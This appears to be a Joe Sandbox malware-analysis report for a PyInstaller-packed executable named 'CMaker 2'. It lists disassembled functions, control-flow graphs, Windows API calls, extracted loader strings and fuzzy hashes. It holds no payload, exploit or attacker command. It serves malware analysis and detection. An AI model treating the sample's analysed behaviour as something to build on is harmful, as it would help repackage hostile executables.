                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-runtime-tmpdir
                                                                                                                                                                                  • API String ID: 514040917-560148345
                                                                                                                                                                                  • Opcode ID: 661437280b8b225c8070a1cf8d5dd25b30cd138fb2fa166c6713422b48c64e17
                                                                                                                                                                                  • Instruction ID: 130f31fdbc4349918dbaff94314c5bb4cc284975a580dc01475499f0f6d8ae25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 661437280b8b225c8070a1cf8d5dd25b30cd138fb2fa166c6713422b48c64e17
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C027961A0C68390FF25EB20D8942F923A5AF56784FC451F2DA6EC62D6FF2CE558D310
                                                                                                                                                                                  Function 00007FF6FABE18D0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 592 7ff6fabe18d0-7ff6fabe190b call 7ff6fabe31a0 595 7ff6fabe1ba1-7ff6fabe1bc5 call 7ff6fabea9b0 592->595 596 7ff6fabe1911-7ff6fabe1951 call 7ff6fabe6870 592->596 601 7ff6fabe1b8e-7ff6fabe1b91 call 7ff6fabee444 596->601 602 7ff6fabe1957-7ff6fabe1967 call 7ff6fabeeacc 596->602 606 7ff6fabe1b96-7ff6fabe1b9e 601->606 607 7ff6fabe1981-7ff6fabe199d call 7ff6fabee794 602->607 608 7ff6fabe1969-7ff6fabe197c call 7ff6fabe1db0 602->608 606->595 613 7ff6fabe199f-7ff6fabe19b2 call 7ff6fabe1db0 607->613 614 7ff6fabe19b7-7ff6fabe19cc call 7ff6fabf4c14 607->614 608->601 613->601 619 7ff6fabe19ce-7ff6fabe19e1 call 7ff6fabe1db0 614->619 620 7ff6fabe19e6-7ff6fabe1a67 call 7ff6fabe1bd0 * 2 call 7ff6fabeeacc 614->620 619->601 628 7ff6fabe1a6c-7ff6fabe1a7f call 7ff6fabf4c30 620->628 631 7ff6fabe1a81-7ff6fabe1a94 call 7ff6fabe1db0 628->631 632 7ff6fabe1a99-7ff6fabe1ab2 call 7ff6fabee794 628->632 631->601 637 7ff6fabe1ab4-7ff6fabe1ac7 call 7ff6fabe1db0 632->637 638 7ff6fabe1acc-7ff6fabe1ae8 call 7ff6fabee508 632->638 637->601 643 7ff6fabe1afb-7ff6fabe1b09 638->643 644 7ff6fabe1aea-7ff6fabe1af6 call 7ff6fabe1df0 638->644 643->601 646 7ff6fabe1b0f-7ff6fabe1b1e 643->646 644->601 648 7ff6fabe1b20-7ff6fabe1b26 646->648 649 7ff6fabe1b40-7ff6fabe1b4f 648->649 650 7ff6fabe1b28-7ff6fabe1b35 648->650 649->649 651 7ff6fabe1b51-7ff6fabe1b5a 649->651 650->651 652 7ff6fabe1b6f 651->652 653 7ff6fabe1b5c-7ff6fabe1b5f 651->653 655 7ff6fabe1b71-7ff6fabe1b8c 652->655 653->652 654 7ff6fabe1b61-7ff6fabe1b64 653->654 654->652 656 7ff6fabe1b66-7ff6fabe1b69 654->656 655->601 655->648 656->652 657 7ff6fabe1b6b-7ff6fabe1b6d 656->657 657->655
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 840049012-3497178890
                                                                                                                                                                                  • Opcode ID: 0c3645ffe4b954c7cdac3af421c254594a9a9c955ee43b292e4fc0835233fd45
                                                                                                                                                                                  • Instruction ID: 04fe0394b46b3c1f6f0ce9db7d8b51933c119c72f7c25c432305b1c5e58e16a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c3645ffe4b954c7cdac3af421c254594a9a9c955ee43b292e4fc0835233fd45
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E71D271B0868685EB60CB24E0903F963A1FF5A780F9490F5E9AEC77D9FE6DE5448700
                                                                                                                                                                                  Function 00007FF6FABE1420 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                  • Opcode ID: ef7657222e4528701c2384f6a5d2e153e0b799e323a01b0b8a7e67a859d84754
                                                                                                                                                                                  • Instruction ID: 279696541d8bade015a870367066ae10042586f14fb06624f26be22086e27fbe
                                                                                                                                                                                  • Opcode Fuzzy Hash: ef7657222e4528701c2384f6a5d2e153e0b799e323a01b0b8a7e67a859d84754
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07418F61B0864282EB24DB15F4805BA63A0EF567D0FE490B2DE6EC7AD5FE7CE5418700
                                                                                                                                                                                  Function 00007FF6FABE11D0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1060 7ff6fabe11d0-7ff6fabe122d call 7ff6fabea1f0 1063 7ff6fabe122f-7ff6fabe1256 call 7ff6fabe1df0 1060->1063 1064 7ff6fabe1257-7ff6fabe126f call 7ff6fabf4c30 1060->1064 1069 7ff6fabe1271-7ff6fabe1288 call 7ff6fabe1db0 1064->1069 1070 7ff6fabe128d-7ff6fabe129d call 7ff6fabf4c30 1064->1070 1075 7ff6fabe13e9-7ff6fabe141d call 7ff6fabe9ed0 call 7ff6fabf4c1c * 2 1069->1075 1076 7ff6fabe129f-7ff6fabe12b6 call 7ff6fabe1db0 1070->1076 1077 7ff6fabe12bb-7ff6fabe12cd 1070->1077 1076->1075 1079 7ff6fabe12d0-7ff6fabe12ed call 7ff6fabee794 1077->1079 1084 7ff6fabe12f2-7ff6fabe12f5 1079->1084 1086 7ff6fabe13e1 1084->1086 1087 7ff6fabe12fb-7ff6fabe1305 call 7ff6fabee508 1084->1087 1086->1075 1087->1086 1093 7ff6fabe130b-7ff6fabe1317 1087->1093 1094 7ff6fabe1320-7ff6fabe1348 call 7ff6fabe8630 1093->1094 1097 7ff6fabe134a-7ff6fabe134d 1094->1097 1098 7ff6fabe13c6-7ff6fabe13dc call 7ff6fabe1df0 1094->1098 1100 7ff6fabe134f-7ff6fabe1359 1097->1100 1101 7ff6fabe13c1 1097->1101 1098->1086 1102 7ff6fabe1384-7ff6fabe1387 1100->1102 1103 7ff6fabe135b-7ff6fabe1371 call 7ff6fabeeed4 1100->1103 1101->1098 1105 7ff6fabe139a-7ff6fabe139f 1102->1105 1106 7ff6fabe1389-7ff6fabe1397 call 7ff6fac09f10 1102->1106 1110 7ff6fabe1373-7ff6fabe137d call 7ff6fabee508 1103->1110 1111 7ff6fabe137f-7ff6fabe1382 1103->1111 1105->1094 1109 7ff6fabe13a5-7ff6fabe13a8 1105->1109 1106->1105 1113 7ff6fabe13aa-7ff6fabe13ad 1109->1113 1114 7ff6fabe13bc-7ff6fabe13bf 1109->1114 1110->1105 1110->1111 1111->1098 1113->1098 1116 7ff6fabe13af-7ff6fabe13b7 1113->1116 1114->1086 1116->1079
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                  • API String ID: 2050909247-2813020118
                                                                                                                                                                                  • Opcode ID: e881507698fb11e158a9860e29cc30c44dc8c29a44b82b02197c1a29374c24d5
                                                                                                                                                                                  • Instruction ID: e5806725412108f7a44753804c1ca7a812eb49f989eb37a78fb93d9739ef329e
                                                                                                                                                                                  • Opcode Fuzzy Hash: e881507698fb11e158a9860e29cc30c44dc8c29a44b82b02197c1a29374c24d5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27510562A0868251EB60DB11F4803BA6291BF96794FE841B5ED6EC7BC5FF3CE445C300
                                                                                                                                                                                  Function 00007FF6FABFEBFC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1118 7ff6fabfebfc-7ff6fabfec4e 1119 7ff6fabfec54-7ff6fabfec57 1118->1119 1120 7ff6fabfed3f 1118->1120 1121 7ff6fabfec61-7ff6fabfec64 1119->1121 1122 7ff6fabfec59-7ff6fabfec5c 1119->1122 1123 7ff6fabfed41-7ff6fabfed5d 1120->1123 1124 7ff6fabfed24-7ff6fabfed37 1121->1124 1125 7ff6fabfec6a-7ff6fabfec79 1121->1125 1122->1123 1124->1120 1126 7ff6fabfec7b-7ff6fabfec7e 1125->1126 1127 7ff6fabfec89-7ff6fabfeca8 LoadLibraryExW 1125->1127 1128 7ff6fabfec84 1126->1128 1129 7ff6fabfed7e-7ff6fabfed8d GetProcAddress 1126->1129 1130 7ff6fabfed5e-7ff6fabfed73 1127->1130 1131 7ff6fabfecae-7ff6fabfecb7 GetLastError 1127->1131 1132 7ff6fabfed10-7ff6fabfed17 1128->1132 1134 7ff6fabfed8f-7ff6fabfedb6 1129->1134 1135 7ff6fabfed1d 1129->1135 1130->1129 1133 7ff6fabfed75-7ff6fabfed78 FreeLibrary 1130->1133 1136 7ff6fabfecfe-7ff6fabfed08 1131->1136 1137 7ff6fabfecb9-7ff6fabfecd0 call 7ff6fabf515c 1131->1137 1132->1125 1132->1135 1133->1129 1134->1123 1135->1124 1136->1132 1137->1136 1140 7ff6fabfecd2-7ff6fabfece6 call 7ff6fabf515c 1137->1140 1140->1136 1143 7ff6fabfece8-7ff6fabfecfc LoadLibraryExW 1140->1143 1143->1130 1143->1136
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED78
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED84
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                  • Opcode ID: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
                                                                                                                                                                                  • Instruction ID: 7eae896d20d601a3cea864bc1705136c38d811f6b8af1151bfab60faeff8ed4f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
                                                                                                                                                                                  • Instruction Fuzzy Hash: E041D469B19A0245FB15CB56A80067523A5BF86BA0F8C9579ED3ED7BD4FF3CE4058300
                                                                                                                                                                                  Function 00007FF6FABFB6D0 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1215 7ff6fabfb6d0-7ff6fabfb6f6 1216 7ff6fabfb711-7ff6fabfb715 1215->1216 1217 7ff6fabfb6f8-7ff6fabfb70c call 7ff6fabfb0e8 call 7ff6fabfb108 1215->1217 1219 7ff6fabfbaeb-7ff6fabfbaf7 call 7ff6fabfb0e8 call 7ff6fabfb108 1216->1219 1220 7ff6fabfb71b-7ff6fabfb722 1216->1220 1231 7ff6fabfbb02 1217->1231 1239 7ff6fabfbafd call 7ff6fabfa4a4 1219->1239 1220->1219 1222 7ff6fabfb728-7ff6fabfb756 1220->1222 1222->1219 1225 7ff6fabfb75c-7ff6fabfb763 1222->1225 1228 7ff6fabfb765-7ff6fabfb777 call 7ff6fabfb0e8 call 7ff6fabfb108 1225->1228 1229 7ff6fabfb77c-7ff6fabfb77f 1225->1229 1228->1239 1234 7ff6fabfb785-7ff6fabfb78b 1229->1234 1235 7ff6fabfbae7-7ff6fabfbae9 1229->1235 1237 7ff6fabfbb05-7ff6fabfbb1c 1231->1237 1234->1235 1236 7ff6fabfb791-7ff6fabfb794 1234->1236 1235->1237 1236->1228 1240 7ff6fabfb796-7ff6fabfb7bb 1236->1240 1239->1231 1243 7ff6fabfb7ee-7ff6fabfb7f5 1240->1243 1244 7ff6fabfb7bd-7ff6fabfb7bf 1240->1244 1248 7ff6fabfb7ca-7ff6fabfb7e1 call 7ff6fabfb0e8 call 7ff6fabfb108 call 7ff6fabfa4a4 1243->1248 1249 7ff6fabfb7f7-7ff6fabfb81f call 7ff6fabfd444 call 7ff6fabfa0e4 * 2 1243->1249 1246 7ff6fabfb7c1-7ff6fabfb7c8 1244->1246 1247 7ff6fabfb7e6-7ff6fabfb7ec 1244->1247 1246->1247 1246->1248 1251 7ff6fabfb86c-7ff6fabfb883 1247->1251 1280 7ff6fabfb974 1248->1280 1276 7ff6fabfb821-7ff6fabfb837 call 7ff6fabfb108 call 7ff6fabfb0e8 1249->1276 1277 7ff6fabfb83c-7ff6fabfb867 call 7ff6fabfbef8 1249->1277 1254 7ff6fabfb885-7ff6fabfb88d 1251->1254 1255 7ff6fabfb8fe-7ff6fabfb908 call 7ff6fac0371c 1251->1255 1254->1255 1260 7ff6fabfb88f-7ff6fabfb891 1254->1260 1268 7ff6fabfb992 1255->1268 1269 7ff6fabfb90e-7ff6fabfb923 1255->1269 1260->1255 1264 7ff6fabfb893-7ff6fabfb8a9 1260->1264 1264->1255 1265 7ff6fabfb8ab-7ff6fabfb8b7 1264->1265 1265->1255 1270 7ff6fabfb8b9-7ff6fabfb8bb 1265->1270 1272 7ff6fabfb997-7ff6fabfb9b7 ReadFile 1268->1272 1269->1268 1274 7ff6fabfb925-7ff6fabfb937 GetConsoleMode 1269->1274 1270->1255 1275 7ff6fabfb8bd-7ff6fabfb8d5 1270->1275 1278 7ff6fabfbab1-7ff6fabfbaba GetLastError 1272->1278 1279 7ff6fabfb9bd-7ff6fabfb9c5 1272->1279 1274->1268 1281 7ff6fabfb939-7ff6fabfb941 1274->1281 1275->1255 1283 7ff6fabfb8d7-7ff6fabfb8e3 1275->1283 1276->1280 1277->1251 1288 7ff6fabfbabc-7ff6fabfbad2 call 7ff6fabfb108 call 7ff6fabfb0e8 1278->1288 1289 7ff6fabfbad7-7ff6fabfbada 1278->1289 1279->1278 1285 7ff6fabfb9cb 1279->1285 1282 7ff6fabfb977-7ff6fabfb981 call 7ff6fabfa0e4 1280->1282 1281->1272 1287 7ff6fabfb943-7ff6fabfb965 ReadConsoleW 1281->1287 1282->1237 1283->1255 1292 7ff6fabfb8e5-7ff6fabfb8e7 1283->1292 1296 7ff6fabfb9d2-7ff6fabfb9e7 1285->1296 1298 7ff6fabfb967 GetLastError 1287->1298 1299 7ff6fabfb986-7ff6fabfb990 1287->1299 1288->1280 1293 7ff6fabfbae0-7ff6fabfbae2 1289->1293 1294 7ff6fabfb96d-7ff6fabfb96f call 7ff6fabfb07c 1289->1294 1292->1255 1302 7ff6fabfb8e9-7ff6fabfb8f9 1292->1302 1293->1282 1294->1280 1296->1282 1304 7ff6fabfb9e9-7ff6fabfb9f4 1296->1304 1298->1294 1299->1296 1302->1255 1308 7ff6fabfba1b-7ff6fabfba23 1304->1308 1309 7ff6fabfb9f6-7ff6fabfba0f call 7ff6fabfb2e8 1304->1309 1312 7ff6fabfba25-7ff6fabfba37 1308->1312 1313 7ff6fabfba9f-7ff6fabfbaac call 7ff6fabfb128 1308->1313 1317 7ff6fabfba14-7ff6fabfba16 1309->1317 1314 7ff6fabfba92-7ff6fabfba9a 1312->1314 1315 7ff6fabfba39 1312->1315 1313->1317 1314->1282 1318 7ff6fabfba3e-7ff6fabfba45 1315->1318 1317->1282 1320 7ff6fabfba81-7ff6fabfba8c 1318->1320 1321 7ff6fabfba47-7ff6fabfba4b 1318->1321 1320->1314 1322 7ff6fabfba4d-7ff6fabfba54 1321->1322 1323 7ff6fabfba67 1321->1323 1322->1323 1324 7ff6fabfba56-7ff6fabfba5a 1322->1324 1325 7ff6fabfba6d-7ff6fabfba7d 1323->1325 1324->1323 1326 7ff6fabfba5c-7ff6fabfba65 1324->1326 1325->1318 1327 7ff6fabfba7f 1325->1327 1326->1325 1327->1314
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 516356d96cf40940481ead1f43cbac67c021cc9b8e5dc6dabb769548680b21bc
                                                                                                                                                                                  • Instruction ID: c3002f006280d611fb7b514197dee55ad8e5b0a7fff8853a383ef1c7cba59764
                                                                                                                                                                                  • Opcode Fuzzy Hash: 516356d96cf40940481ead1f43cbac67c021cc9b8e5dc6dabb769548680b21bc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BC1D52AA0C78789EB509B95D4402BD7B90EF82B80FDD4179DA6D837D1EE7DE845C700
                                                                                                                                                                                  Function 00007FF6FABE25A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF6FABE26F4), ref: 00007FF6FABE25D1
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE1ED0: GetLastError.KERNEL32 ref: 00007FF6FABE1EEC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE1ED0: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FABE25EE,?,00007FF6FABE26F4), ref: 00007FF6FABE1F56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileFormatLastMessageModuleName
                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                  • API String ID: 1234058594-2863816727
                                                                                                                                                                                  • Opcode ID: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
                                                                                                                                                                                  • Instruction ID: 7e53c6e92e006c02139f355eacdbe8c77db174c9963b0569700789ef8149ba67
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE216061B1C64281FF24DB35E8913B92261AF6A394FC042B6E67EC65DAFE2CE504C700
                                                                                                                                                                                  Function 00007FF6FABFCBE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCCFC
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCD87
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                  • Opcode ID: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
                                                                                                                                                                                  • Instruction ID: 5abbc83ef5618b1f62f7c50210971ff04dcbf3ec099f590f37ed649e21fae4ce
